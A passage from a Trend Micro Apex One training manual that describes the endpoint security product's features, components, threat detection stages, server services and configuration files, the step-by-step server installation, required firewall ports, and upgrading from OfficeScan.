security risks by scanning files for malware and then performing a specific action for each security
risk detected. To easily monitor, investigate and back-up infected files, Security Agents can
automatically forward infected or suspicious files to a quarantine folder.

Damage Cleanup Services clean computers of file-based and network viruses, and virus and worm
remnants (Trojans, registry entries, viral files) through a fully-automated process. Damage Cleanup
Services runs automatically in the background without having to configure it. Users are not even
aware when it runs unless Apex One needs to notify the user to restart their endpoint to complete
the process of removing a Trojan.

Ransomware Protection
Enhanced scan features can identify and block ransomware programs that target documents on
endpoint computers by identifying common behaviors and blocking processes commonly associated
with ransomware programs.

Predictive Machine Learning


Predictive Machine Learning can protect your network from new, previously unidentified, or
unknown threats through advanced file feature analysis and heuristic process monitoring. Apex One
delivers this functionality through a cloud-based machine learning model and introduces a local
model for computers without a network connection.

Behavior Monitoring
Behavior Monitoring constantly monitors and protects Agents from unusual and unauthorized
modifications to the operating system or installed software.

© 2019 Trend Micro Inc. Education 5


Lesson 1: Trend Micro Apex One Overview

Connected Threat Defense


Connected Threat Defense is a collective feature of Trend Micro products to maximize network
protection. Security Agents can submit suspicious file to Deep Discovery Analyzer, where the file is
executed in a sandbox environment. Files determined to be dangerous are submitted to Apex
Central for addition to the Suspicious Objects List. You can configure Apex One to subscribe to the
Suspicious Object List and customized actions can be created for these objects. This provides
custom defense against threats identified by endpoints protected by Trend Micro products in your
environment.

Web Threat Protection


Web Reputation technology protects Agent computers within or outside the corporate network from
malicious and potentially dangerous Web sites. This service breaks the infection chain and prevents
downloading of malicious code. The credibility of Web sites and pages can be verified by integrating
Apex One with the Smart Protection Server or the Trend Micro Smart Protection Network.

The Apex One Suspicious Connection Service monitors the behavior of connections that endpoint
make to potential Command & Control servers and the Browser Exploit Protection blocks Web pages
containing malicious scripts.

Firewall Protection
The Apex One firewall protects endpoint computers on the network using stateful inspection. Rules
can be created to filter connections by application, IP address, port number and protocol, and then
applied to different groups of users.

Data Loss Prevention


Data Loss Prevention safeguards an organization’s digital assets against accidental or deliberate
leakage.

Device Control
Device Control regulates access to external storage devices and network resources connected to
computers. Device Control helps prevent data loss and leakage, and, combined with file scanning,
helps guard against security risks.

Outbreak Control
Apex One Outbreak Prevention Services shut down infection vectors and rapidly deploys attack
specific security policies to prevent or contain outbreaks before pattern files are available.

6 © 2019 Trend Micro Inc. Education


Lesson 1: Trend Micro Apex One Overview

Application Control
Application Control enhances defense against malware or targeted attacks by preventing unwanted
and unknown application from executing on endpoints. Application Control is currently only
supported on Windows endpoint computers.

Virtual Patching
Vulnerability Protection protects endpoints from being exploited by operating system vulnerability
attacks. It automates the application of virtual patches to endpoint computer before official patches
from the vendor become available.

Endpoint Detection and Response


Apex One provides actionable insights, expanded investigative capabilities, and centralized visibility
across the network through an advanced Endpoint Detection and Response (EDR) toolset. Perform
threat investigation through integrated EDR or by boosting your security teams with the Managed
Detection and Response (MDR) service option. Endpoint Detection and Response capabilities are
included in Apex One and Apex Central but are licensed separately.

Endpoint Encryption
Endpoint Encryption encrypts data on a wide range of devices including laptops and desktops, USB
drives, and other removable media, providing full disk, file/folder, and removable media encryption to
prevent unauthorized access and use of private information. Endpoint Encryption is a standalone
product that is licensed and installed separately from Apex One, but its capabilities can be integrated
into Apex One Security Agents through Apex Central policies.

Cloud-Based Intelligence
Apex One benefits from a global cloud-based repository of threat data through the Trend Micro
Smart Protection Network. Services, such as ActiveUpdate, File Reputation, Web Reputation,
Predictive Machine Learning and more are delivered to Trend Micro products through the cloud-
based Smart Protection Network.

Automated Updates
Apex One Agents benefit regular, automated updates to malware signatures and patterns.

Multi-Platform Support
Apex One provides endpoint protection features for both Windows and Mac operating systems.
Support for Mac endpoints is enabled through a plug-in in Apex One. Not all Apex One functionality is
currently available on Mac endpoint computers.

© 2019 Trend Micro Inc. Education 7


Lesson 1: Trend Micro Apex One Overview

Simplified Administration
The Apex One Web Management console gives administrators access to all Agents and Servers on
the network. From the Web Management console, administrators can coordinate automatic
deployment of security policies, pattern files, and software updates on every Agent and server. Apex
One also performs real-time monitoring, provides event notification and delivers comprehensive
reporting. Administrators can perform remote administration, remote installation of Agents, set
customized policies for individual desktops or groups, and lock Agent security settings.

Off-Premise Management
Apex One provides management to external Security Agents through the Edge Relay Server. This
device provides log collection, sample submission and suspicious list deployment to Agents outside
of the network.

Unified Agent
Apex One provides a wide breadth of capabilities through a single unified agent. This all-in-one
lightweight agent provides deployment flexibility through both Software as a Service (SaaS) and on-
premises options.

8 © 2019 Trend Micro Inc. Education


Lesson 1: Trend Micro Apex One Overview

Trend Micro Apex One Components


Apex One consists of multiple components that work together to protect endpoint computers.

Sandbox Apex One Apex Central


as a Service as a Service as a Service

Apex One
Edge Relay Server
Trend Micro Remote
ActiveUpdate Server Security Agents

Apex Central

Apex One Apex One (Mac)


Server Server

Active Directory Apex One/Apex One (Mac)


Web Management Console

IIS Database

Deep Discovery Mac Sandbox


Analyzer

Smart Protection
Server Trend Micro
Endpoint Encryption

Update Agent Security Agents

Apex One Server


The Apex One Server is the central repository for all Windows Agent configurations, security risk
logs, and updates. The server performs two important functions:
• Installs, monitors, and manages Security Agents on Windows endpoints
• Downloads most of the components needed by Agents

© 2019 Trend Micro Inc. Education 9


Lesson 1: Trend Micro Apex One Overview

Apex One (Mac) Server


The Apex One (Mac) Server is the central repository for all Mac Security Agent configurations,
security risk logs, and updates. The server performs two important functions:
• Monitors and manages Security Agents on Mac endpoints
• Downloads components needed by Security Agents

Apex One (Mac) Server is activated though a plug-in within Apex One Server. The Server
communicates with the Security Agents through the ActiveMQ protocol.

Database
The database stores all the information Apex One requires to operate. A Microsoft SQL Server
database is required to complete the Apex One setup. Alternately, an SQL Server Express database
can be installed as part of the setup process. The database can be hosted on the same server as
Apex One, or can hosted on a separate server.

Microsoft Internet Information Server


Microsoft Internet Information Server (IIS) makes it possible to access Apex One components from
the Internet, including:
• Apex One Web Management console for management operations
• CGI applications or ISAPI for both Agent and Server functions
• Update components
• Integrated Smart Protection Server

Apex One/Apex One (Mac) Web Management Console


Apex One uses a Web-based administration interface to control policies and endpoint computers.
Administrative users authenticate to the Apex One Web Management console using Apex One-
created credentials, or credentials stored in Microsoft Active Directory. Separate Web Management
consoles are available for Apex One and Apex One (Mac).

Apex Central
Apex Central (previously known as Control Manager) provides a single unified interface to manage,
monitor, and report across multiple layers of security and deployment models. Customizable data
displays allow administrators to rapidly assess status, identify threats, and respond to incidents.
With Apex Central, administrators can manage Apex One, Apex One (Mac), as well as other Trend
Micro products, from a single interface.

User-based visibility shows what is happening across all endpoints, enabling administrators to
review policy status and make changes across all user devices. In the event of a threat outbreak,
administrators have complete visibility of an environment to track how threats have spread.

10 © 2019 Trend Micro Inc. Education


Lesson 1: Trend Micro Apex One Overview

Direct links to Trend Micro Threat Connect database provides access to actionable threat
intelligence, which allows administrators to explore the complex relationships between malware
instances, creators, and deployment methods.

Apex Central is responsible for compiling the Suspicious Objects for use in Connected Threat
Defense. This list based on information provided by other components in the infrastructure.

Some features in Apex One, including Application Control, Vulnerability Protection and Endpoint
Detection and Response require integration with Apex Central.

Security Agents
An Apex One Security Agent on each endpoint protects Windows and Mac computers from security
risks. The Apex One Agent reports to the parent Apex One Server from which it was installed and
sends security events and status information to the Server in real time. Security Agents can be
installed on endpoints computer within and outside the corporate network.

Apex One Edge Relay Server


The Apex One Edge Relay Server provides off-premise protection for remote computing and
traveling users. It provides visibility and protection for endpoints that leave the local intranet,
without requiring a VPN to connect back to the Apex One Server.

Trend Micro Smart Protection Network


The Trend Micro Smart Protection Network is a cloud-client infrastructure that delivers protection
from emerging threats by continuously evaluating and correlating threat and reputation intelligence
for Websites, email sources, and files.

Smart Protection Server


The Smart Protection Server provides an internal, standalone version of the Smart Protection
Servers for File and Web Reputation services. The Smart Protection Server can also be used to proxy
service requests for Predictive Machine Learning scanning in air-gapped environments.

Trend Micro ActiveUpdate Server


Trend Micro ActiveUpdate Server serves as the default download source for pattern file and
program updates. Other sources, including Apex Central or Update Agents can be used as the
download location instead of the ActiveUpdate Server.

Update Agents
Update Agents are Security Agents that function as alternative update sites for other Agents within
an Apex One network. Update Agents serve as local ActiveUpdate sites.

© 2019 Trend Micro Inc. Education 11


Lesson 1: Trend Micro Apex One Overview

Trend Micro Endpoint Encryption


Trend Micro Endpoint Encryption encrypts data on a wide range of devices — both PCs and Macs,
laptops and desktops, USB drives, and other removable media. This solution combines enterprise-
wide full disk, file/folder, and removable media encryption to prevent unauthorized access and use
of private information. Endpoint Encryption is an optional, standalone product, but can be
incorporated into policies distributed through Apex Central.

Deep Discovery Analyzer


Deep Discovery Analyzer is a hardware device hosting multiple secure sandbox environments in
which samples submitted by Trend Micro products are analyzed. Sandbox images allow for the
observation of file and network behavior in a natural setting without any risk of compromising the
network.

Deep Discovery Analyzer performs static analysis and behavior simulation to identify potentially
malicious characteristics. During analysis, Deep Discovery Analyzer rates the characteristics in
context and then assigns a risk level to the sample based on the accumulated ratings which is then
forwarded to Apex Central to build the Suspicious Objects List.

Mac Sandbox
Mac Sandbox is hosted service that analyzes possible threats for macOS.

Software as a Service Components


Apex One is available as a Software as a Service offering. Components available as a service are
accessed from cloud servers hosted by Trend Micro.

Apex One as a Service

Apex One as a Service allows an organization to deploy and manage Apex One as cloud-based
service and offers full feature parity with the on-premises option.

Apex Central as a Service

Apex Central as a Service provides Apex Central capabilities as a cloud-based service.

Sandbox as a Service

This cloud-based Virtual Analyzer allows you to perform sample submission, synchronize
suspicious object lists, and take action on user-defined suspicious objects.

12 © 2019 Trend Micro Inc. Education


Lesson 1: Trend Micro Apex One Overview

Optional Third-Party Components

Microsoft Active Directory

Apex One integrates with Microsoft™ Active Directory™ to manage Security Agents more
efficiently. Web Management console permissions can be assigned using Active Directory
accounts, endpoint computers without security Agents can be located and automated grouping
of agents based on Active Directory domain can be performed.

Trend Micro Apex One Deployment Methods

On-Premise Apex One Server


An on-premise installation of Apex One installs the Apex One Server on a Windows Server within the
local network.

Apex One as a Service


Apex One as a Service provides rapid deployment and simplified administration and maintenance
with the same comprehensive enterprise threat protection as Trend Micro on-premises Apex One.
Apex One as a Service is delivered through an architecture that uses resources more effectively and
optimizes CPU and network utilization.

With this service offering, Trend Micro applies updates and patches to the service on a regular basis.
Administrators log into the Web Management console through a customized URL. Trend Micro
provides feature parity between the on-premise and service version of Apex One.

An on-premise deployment of Apex One can be migrated to Apex One as a Service.

© 2019 Trend Micro Inc. Education 13


Lesson 1: Trend Micro Apex One Overview

Threat Detection
There are several points at which threats could enter the system through the endpoint computer. A
variety of automated threat detection techniques can be enabled in Apex One to monitor for threats on
the endpoint.
Entry Exit
point Pre-execution Runtime point

Detecting Threats at the Entry Point


Entry point detection uses methods to capture threats as they enter the endpoint. These methods
include:
• Web Reputation: Web reputation blocks connections to malicious Web sites. This is done at
the kernel level, allowing Apex One to not only block users from accessing a malicious site,
but also blocking programs on the endpoint from accessing the site. 
• Operating System Vulnerability Protection: Apex One block exploits of operating system
vulnerabilities by applying a virtual patch. Trend Micro provides timely protection for
operating system vulnerabilities with the industry’s most timely vulnerability research.
• Browser Exploits: Malicious behavior can also be captured within the Web browser based on
script inspection and site behavior.
• Device Control: Apex One can block unknown removable media devices, making it less likely
for the endpoint to be infected with malware. This protection is now also available for the
Mac in Apex One.

Detecting Threats Pre-execution


Detection methods used in the pre-execution phase capture and block threats as they are written to
disk or to memory. These methods include:
• Packer Detection: Apex One identifies packed malware as it unpacks prior to execution,
blocking threats attempting to hide themselves in memory.
• Predictive Machine Learning: File-based threats can be evaluated against a cloud-based
model before they are run to predict if the file is malicious. Apex One can take advantage of
an offline model in cases where the endpoint is not connected to the network. Mac
computers can now benefit from this technique as well.
• Application Control: Application control prevents unrecognized software from executing.

14 © 2019 Trend Micro Inc. Education


Lesson 1: Trend Micro Apex One Overview

• Variant Protection: Variant protection detects mutations of malicious samples by


recognizing known fragments of malware code.
• File-based Signatures: The majority of threats still arrive at the endpoint as file-based
attacks. File-based signatures provide an effective technique for detecting known malicious
items.

Detecting Threats at Runtime


While many threats can be detected as they are written to disk, there are some threats that won’t be
detected until they execute. Detection methods used in this phase include:
• Predictive Machine Learning: Run-time machine learning techniques monitor anything that
is executing and evaluates it against a separate run-time machine learning model.
• Behavior Analysis: Powerful behavior analysis techniques provide a clear indication if an
attack is taking place based on file behavior. This provides an effective mechanism for
detecting ransomware and file-less malware. New rules are continually being introduced to
detect new suspicious behavior.
• In-memory Runtime Analysis: Some malware executes only in memory. In-memory runtime
analysis can monitor for malicious script behavior or code injections in memory and stop
them once they start running.

Detecting Threats at the Exit Point


Methods in this phase can detect and block attempts to forward data from the endpoint. Detection
methods used in this phase include:
• Web Reputation: At this phase, Web reputation protection can block connections to
malicious Web sites, such as Command & Control sites. Again, this protection is applied at
the kernel level blocking connections from the Web browser, or from any other application
running on the endpoint.
• Host Intrusion Prevention: Host intrusion prevention detects and blocks malware lateral
movement behavior.
• Data Exfiltration Detection: Data Leak Prevention techniques can detect sensitive data
leaving the endpoint and block its movement.
• Device Control: Unknown removable media devices can be blocked to prevent data leaving
the endpoint

© 2019 Trend Micro Inc. Education 15


Lesson 1: Trend Micro Apex One Overview

16 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Lesson 2: Trend Micro Apex One Server

Lesson Objectives:

After completing this lesson, participants will be able to:


• Identify the responsibilities the Apex One Server
• Identify the Apex One Server services and components
• Install the Apex One Server
• Upgrade OfficeScan XG and OfficeScan XG SP1 to Apex One

Apex One Server Tasks


The Apex One Server provides centralized management and control of the Apex One network. The Apex
One server component performs the following tasks:
• Distributes protection setting to endpoint computers
• Initializes scanning, cleaning, and other tasks
• Receives action status results
• Monitors suspicious network activity on Agents
• Maintains a central repository for all Agent configuration settings, virus and firewall logs,
Outbreak Prevention Policies, and Agent software and updates
• Installs Security Agents
• Installs components such as the Smart Protection Server, Apex One (Mac) Server and other
optional components included in the installation package
• Provides Server Authentication to ensure that all communication to and from the server is
secure and trusted
• Collects suspicious file sample and forwards for analysis
• Retrieves Suspicious Objects list from Apex Central and forwards to Agents for logging/blocking
purposes
• Stores metadata collected by Endpoint Sensor for Endpoint Detection and Response activities

© 2019 Trend Micro Inc. Education 17


Lesson 2: Trend Micro Apex One Server

Apex One Server Services and Components


The following services and components are installed as part of the Apex One Server.

Component Description
Apex One Master Service This component is the centralized management component of an Apex
(Ofcservice.exe) One network. It accepts and responds to commands and requests from
Apex One Security Agents, the Web Management console, and Apex
Central.
This service will always be running on the Apex One Server and
provides the following functionality for its clients:
• Stores Agent configuration settings
• Consolidates Agent logs
• Serves as the default source for update components (for
example, patterns, engines, etc.)
• Provides server authentication details to ensures that all
communications that the Apex One Server sends to the Agents
are trusted.
The Security Agent verifies the appended signature every time
it receives a notification from the server. The Agents use a
public key to verify that incoming communications are server-
initiated and valid. The Agents will only respond if the
verification is successful. If the signature verification fails, the
Agent disregards the received settings.
Apex One Apex Central Agent Allows administrators to manage Apex One from the Apex Central
Service console. This facilitates management of multiple Apex One Servers,
(OfficeScanCMAgent.exe) Apex One (Mac) Servers as well as other Trend Micro products. Apex
Central also compiles and enables access to the Suspicious Objects
List.
Apex One Active Directory This component interfaces with Microsoft Active Directory to provide:
Integration Service • Role-based administration
(osceintegrationservice
.exe) • Compliance report generation
• Identification of unprotected endpoints
• Automatic grouping of Security Agents.
Apex One Deep Discovery This components handles the internal transmission of Suspicious
Service (OfcDdaSvr.exe) Object samples and submits samples to Deep Discovery Analyzer.
Apex One Log Receiver
This service receives log information from Apex One Servers and
Service
Security Agents.
(ofclogrecvsvc.exe)
Apex One Plug-in Manager
(CNTAoSMgr.exe) This service installs and manages Apex One plug-in programs.

Trend Micro Endpoint Sensor Manages communication and provides support for tasks required by
Service
(TrendMicroEndpointSens the Trend Micro Endpoint Sensor Server. This service is added when
Endpoint Sensor policies are enabled.
orService.exe)
Trend Micro Application Manages the allowed, blocked, and lockdown policies of the
Control Service Application Control feature. This service is added when Application
(TMiACSvc.exe) Control policies are enabled.

18 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Component Description
Trend Micro Vulnerability Manages protected endpoints with Intrusion Prevention rules based
Protection Service on network performance and security priorities. This service is added
(iVPServer.exe) when Vulnerability Protection policies are enabled.
Trend Micro Advanced Threat Identifies potentially compromised endpoints through on-demand
Assessment Service assessment and monitoring. By integration with Trend Micro Threat
(AtasAgent.exe) Investigation Center, Advanced Threat Assessment Service allows
administrators and information security experts to perform forensic
tasks on endpoints for remote incident response.
Trend Micro Local Web
Provides the local web classification scan function to Apex One
Classification Server
Security Agents.
(LWCSService.exe)
Trend Micro Smart Protection Provides the Smart Scan function to Apex One Security Agents.
Server
(iCRCService.exe) • File Reputation: Provides Agents with a source for malware
confirmation and removal information. Agents obtain this
information by way of HTTP/HTTPS queries.
• Integrated Web Reputation Service: Provides Agents with a
source of information regarding known malicious websites.
Trend Micro Smart Protection
Query Handler Provides the smart relay function to Apex One Security Agents.
(SRService.exe)

Web Server
The Internet Information Server (IIS) Web Server makes it possible to access the following Apex One
components from the Internet:
• Web Management console
• CGI applications or ISAPI for both Agent and Server functions
• Update components
• Integrated Smart Protection Server

© 2019 Trend Micro Inc. Education 19


Lesson 2: Trend Micro Apex One Server

Apex One (Mac) Plug-in


Apex One integrates support for Mac endpoints through the Apex One (Mac) Plug-in. A separate Web
Management console is used to manage the Mac endpoints, or they can be managed through Apex
Central.

Configuration Repositories
Apex One Server configuration settings are stored in a variety of locations, including:
• Apex One Database: The database tables used by Apex One are stored in a Microsoft SQL or SQL
Express database.
• ous.ini: Contains information about alternative update sources that an Apex One Server can
use.
• ofcscan.ini: This global Agent setting file contains settings that are common to all Security
Agents that are registered with a specific Apex One Server. Agent-specific local settings
however supersede the settings in this file.
• ofcserver.ini: Contains the global Server setting information, including enabled services,
license details, Web Management console configuration, and others.
• sscfg.ini: Contains information about Smart Protection Servers.
• TrendAuthDef.xml: Contains all users and log-in information. This file is located in:
...\PCCSRV\Private\AuthorStore
• TrendAuth.xml: Contains role information for administrative access. Determines who can
access the administrative console and what access they have. This file is located in:
...PCCSRV\Private\AuthorStore
• Certificate backup zip files: Contains backed up certificates issued by the current Apex One
Server. Backing up the Apex One Server certificates allows you to use these certificates if you
need to reinstall the Apex One server. Run the CertificateManager.exe utility to backup the
certificates and indicate the password and path for the backup file.

20 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Apex One Database


Apex One requires a Microsoft SQL Server database. A database instance must be created in SQL Server
with a username and password assigned. These details must be provided during the setup of the Apex
One Server. An additional database instance can be created to store Endpoint Sensor-related data, but
only when using the full version of SQL Server 2016 with the Full-Text and Semantic Extractions for
Search feature enabled.

If SQL Server is not available in the organization, SQL Server 2016 Express can be installed as part of the
setup.

Installing the Apex One Server


For a successful installation, review the system requirements for Apex One Server before proceeding
with the steps in the installation.

The Apex One Server can be installed on computers running different versions of Microsoft Windows
Server. Supported operating systems are listed in the following table:

OfficeScan OfficeScan
Platform Apex One
XG XG SP1
Windows Server 2008 √ x x
Windows Server 2008 R2 √ √ x
Windows Server 2012 √ √ √
Windows Server 2012 R2 √ √ √
Windows Server 2016 √ √ √
Windows Server 2019 x x √

© 2019 Trend Micro Inc. Education 21


Lesson 2: Trend Micro Apex One Server

Hardware Requirements
• Processor: 1.4 GHz minimum (2.0 GHz recommended) Intel Pentium or equivalent, AMD 64
processor or Intel 64 processor
• Memory: 2GB minimum
• Disk Space: 1.5GB minimum (3GB recommended if activating Application Control, Endpoint
Sensor, Vulnerability Protection and Data Protection on the Security Agent)

Apex One Server Pre-Installation Checklist


Prior to installing Apex One, you should review the following conditions to ensure that all necessary
permissions, ports and other settings are in place.
• Verify that the Windows Server that will be hosting the Apex One Server is running a
supported version.
• Verify that Microsoft Internet Information Server (IIS) is installed.
• An SQL Server database instance is available along with a corresponding administrator
username and password. Alternately, SQL Server 2016 Express can be installed as part of the
setup.
• You will require an Activation Code for the Apex One Server. In addition, some optional
components, such as Endpoint Sensor, require separate licensing. Contact Trend Micro to
get the appropriate codes for your installation.
• If a proxy is needed for Internet access in your environment, you will need to supply your
proxy server address, port and log in credentials as part of the Apex One setup process.
• The Smart Protection Source should be considered as the option to install an integrated
Smart Protection Server will be offered as part of the setup process.
• If the new installation of Apex One will be sharing digital certificates with an existing
installation, the details of the certificates must be provided.

Downloading Apex One Server for Windows


You can download the latest version of the Apex One installation package from the Trend Micro
Download Center at:
http://downloadcenter.trendmicro.com/

In the Desktop category, click Trend Micro Apex One to view the related downloads available.

22 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

On the Product Download tab, locate the installation package and download to the target computer.

Running the Setup


Run the setup application by double-clicking the downloaded setup application and step through the
Setup Wizard by clicking Next on each page after providing the required information.
1 Before beginning the setup, the installer prepares and installs any missing Windows
components.

© 2019 Trend Micro Inc. Education 23


Lesson 2: Trend Micro Apex One Server

2 Click Next to acknowledge the Welcome window.

3 Click I accept the terms of the license agreement to proceed with the setup.

4 Select whether to scan the host computer before installing the Apex One Server. This option will
scan selected folders on the host computer for security risks before beginning the setup. It may
take a few minutes to complete the scan.

24 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Note: An Endpoint Prescan only scans selected folders, it is not a thorough system scan. The \My
Documents folder, for example, will not be scanned. This scan looks for files with specific file
extensions, including .SYS, .COM, .EXE, .DOC, .DOT, .XLS, .VBS, .PIF, and.SCR . If the setup
application detects a virus, you will be prompted for an action such as Clean, Rename, Delete and
Pass. The patterns used by this scan are those that existed when the setup package was created
and could potentially be several months old.

5 The Setup application will assess the resources on the Server to ensure it supports Apex One.

6 Identify the details of any proxy servers being used.

© 2019 Trend Micro Inc. Education 25


Lesson 2: Trend Micro Apex One Server

7 Enter the Activation Codes for Apex One.

Note: Some services in Apex One may require additional licensing.

8 Select the installation path for the program files.

9 Confirm the fully qualified domain name or IP address details for the Apex One Server.

26 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

10 Identify the details of the IIS website to used.

11 Click to enable Endpoint Sensor support on the Apex One Server, if required.

Note: The full version of Microsoft SQL Server 2016 or later must be used as the database if choosing
to enable Endpoint Sensor support. SQL Server Express is not supported if Endpoint Sensor is to
be enabled.

© 2019 Trend Micro Inc. Education 27


Lesson 2: Trend Micro Apex One Server

12 Identify the details of the SQL Server database, or select the option to install SQL Server
Express 2016.

13 Informational details regarding Security Agent deployment is displayed.

14 Click to install an integrated Smart Protection Server, if required.

28 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

15 Click to enable the installation of an Security Agent on the server, if required.

16 Select whether you want to enable Trend Micro Smart Feedback. When enabled, your installation
contributes to the Trend Micro Smart Protection Network to improve analysis, identification, and
prevention of new threats. You can enable or configure Smart Feedback later in the Apex One
Web Management console. Optionally, enter the industry your organization belongs to by
selecting it from the drop-down list.

Note: Trend Micro Smart Feedback provides continuous communication between Trend Micro
products and the company's 24/7 threat research centers and technologies. Each new threat
identified through a single customer's routine reputation check automatically updates all of
Trend Micro's threat databases, blocking any subsequent customer encounters of a given threat.
For example, routine reputation checks are sent to the Smart Protection Network. By
continuously processing the threat intelligence gathered through this global network of
customers and partners, Trend Micro delivers automatic, real-time protection against the latest
threats and provides better together security. The privacy of a customer's personal or business
information is always protected.

Trend Micro Smart Feedback is designed to collect and transfer relevant data from Trend Micro
products to the Smart Protection Network so that further analysis can be conducted, and
consequently, advanced solutions can evolve and be deployed to protect clients.

Samples of information sent to Trend Micro:

© 2019 Trend Micro Inc. Education 29


Lesson 2: Trend Micro Apex One Server

- File checksums
- Websites accessed
- File information, including sizes and paths
- Names of executable files
You can terminate your participation to the program anytime from the Web Management
console.

17 Identify the Agent installation path. A random port number will be issued for communication
between the Apex One Server and the Agent. Record the port number displayed.

18 Click to enable the Apex One Firewall features on this server, if required.

19 Click to enable assessment mode on this server, if required. When in assessment mode, all
Agents managed by the server will log spyware/grayware detected during Manual Scan,
Scheduled Scan, Real-time Scan, and Scan Now but will not clean spyware/grayware
components. Cleaning terminates processes or deletes registries, files, cookies, and shortcuts.

30 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Trend Micro provides assessment mode to allow you to evaluate items that Trend Micro detects
as spyware/grayware and then take appropriate action based on your evaluation.

20 Click to enable the Apex One Web Reputation features on this server, if required.

21 Enable the option to generate new authentication certificates, or use existing certificates from
another Apex One Server.

© 2019 Trend Micro Inc. Education 31


Lesson 2: Trend Micro Apex One Server

22 Type the login credentials for the Root Administrator. This administrator will be able to create
identities for any other administrative users who require access to the Apex One Web
Management console. As well, type the password that will be required to unload or uninstall the
Security Agent from an endpoint computer.

If the two password are identical, the setup program will display a warning. Click Yes to accept
the use of the same passwords, or click No to retype new passwords.

23 Confirm the folder group to display the Apex One program icons.

32 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

24 Finally, review the settings provided and click Install.

25 If the option to install an SQL Server Express 2016 instance, the setup for the database will
launch.

26 A progress bar will display the status of the database installation.

© 2019 Trend Micro Inc. Education 33


Lesson 2: Trend Micro Apex One Server

27 Once the SQL Server Express installation is complete, the Setup Wizard will continue with the
Apex One setup operations.

28 Once complete, click Finish to close the wizard.

29 If the option to launch the console was enabled, the administrator is prompted to log in.

34 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Installation Logs
The Apex One setup application records its actions in an installation log named ofcmas.log, which
it creates in the \Windows folder.

Confirming Successful Installation


Open Windows Services and confirm that the Apex One services are running.

© 2019 Trend Micro Inc. Education 35


Lesson 2: Trend Micro Apex One Server

Ports and Protocols to Allow


Multiple ports must be allowed through an organization’s firewall to enable Apex One to operate.

Name Protocol Port Number Notes


The web server listening port for the Apex One virtual
HTTP 8080 directory. The HTTP or HTTPS ports are used by the
Agents to download pattern file updates, and upload
logs, quarantined files and status information. The
Server Port
HTTPS port is also used by Administrators to connect
HTTPS 4343 to the Apex One Web Management console.
These settings are stored in the Master_DomainPort
parameter in the \PCCSRV\ofcscan.ini file.
Configured during installation. Security Agent
listening port where CGI commands such as update
notifications and configuration changes are received
from the Apex One server. Update Agent hosts also
Random use the Agent Port to reply to download requests for
Agent Port TCP 5-digit port
scan engine and pattern file updates pulled by peer
number Security Agents.
These settings are stored in the
Client_LocalServer_Port parameter in the
\PCCSRV\ofcscan.ini file.
Used to receive queries from Security Agents as part
Integrated Smart HTTP 8080 of cloud technology. When using the Apex One virtual
Protection Server site, the port is 8080 if the Apex One Web
(IIS) HTTPS 4343 Management console uses HTTP. If HTTPS
functionality is used, the port is 4343.
Integrated Web Local Web Reputation Service uses this port to
Reputation Service HTTP 8080 receive queries from Security Agents as part Web
(IIS) Reputation checks.
HTTP 80 Used for notification for updates from Apex Central as
Apex Central well as sending back status/virus events from Apex
HTTPS 443 One Server to Apex Central.
Used when installing Agents by Remote Install and
NetBIOS for TCP/UDP 137, 139, 445 when Agents send quarantined files to the Server
Remote Install
using the UNC path.
LDAP for Active Used when the Security Compliance function retrieves
Directory LDAP 389 Active Directory information.
80, 60162,
License Server TCP/UDP Used to access the Trend Micro License Server.
60163
Used for Security Agent to Edge Relay Server and
Edge Relay Server HTTPS 443 Edge Relay Server to Apex One Server
communication.
Used to check the endpoint connectivity. When
connection is not established, Apex One immediately
treats the endpoint as unreachable. The default
port number is 135.
Unmanaged
TCP 135 Enabling this setting speeds up the query. When
Endpoint
connection to endpoints cannot be established, the
Apex One server no longer needs to perform all the
other connection verification tasks before treating
endpoints as unreachable.

36 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Upgrading to Apex One


Apex One is the new name for OfficeScan; upgrading OfficeScan 11 SP1, XG and XG SP1 will update your
installation to Apex One and convert OfficeScan Agents to new Apex One Security Agents.

Upgrading OfficeScan as a Service to Apex One as a Service


Implementations of OfficeScan as a Service will be automatically upgraded in-place based on Trend
Micro’s upgrade schedule. This will not require any action on the part of the administrator. Once the
account is upgraded to Apex One as a Service, the Security Agents will also be upgraded
automatically. Automatic Agent updating can be disabled if the administrator would like more
control as to when the Security Agents are upgraded. No Apex One features will be available until
the Security Agents are upgraded.

Upgrading OfficeScan to Apex One (on-premise)


OfficeScan 11 SP1, XG and XG SP1 can be upgraded directly to Apex One. If using a previous version of
OfficeScan (11, 10.6 or 10.5), upgrade the installation to OfficeScan XG SP1, then upgrade to Apex
One.

Note: A full back-up should be completed before running the upgrade, in case of any problems. Server
Upgrade options can be classified into the following modes:

In-place Migration

This mode installs Apex One over an existing OfficeScan Server, and the installation program
handles all the relevant changes.

© 2019 Trend Micro Inc. Education 37


Lesson 2: Trend Micro Apex One Server

OfficeScan XG SP1 introduced the use of HTTPS for Server/Agent communication. If upgrading
to Apex One from OfficeScan 11 SP1 or XG, the setup will prompt you to accept the use of HTTPS.

Note: Apex One moves the communication between Agents and the Server to HTTPS. By moving to
HTTPS, the communication port on the server will also change from the HTTP port (default of
8080) to the HTTPS port ( same as the Web Management console, default of 4343).

Some environments may encounter HTTPS communication issues due to various factors (for
example, inconsistent SSL/TLS environments, firewalls blocking the HTTPS port, etc.). This can
result in agents showing offline, failing to upgrade, and not uploading logs or quarantined files.

Depending on the permissions set in OfficeScan, Agents can be automatically upgraded to Apex
One Security Agents as part of the upgrade process. This could introduce load issues in the
environment if all Agents attempt an upgrade all at once. If this is a concern, disable the
automatic upgrading of Agents in OfficeScan before launching the upgrade process.

38 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

A backup of the server information is recommended before upgrading to Apex One. Click Yes to
allow the setup application to perform a backup of the server data.

Apex One integrates Endpoint Sensor capabilities and this optional component can be installed
during the upgrade, if required. Certain database conditions apply if this option is selected.

Apex One requires a Microsoft SQL Server database. If upgrading from an installation of
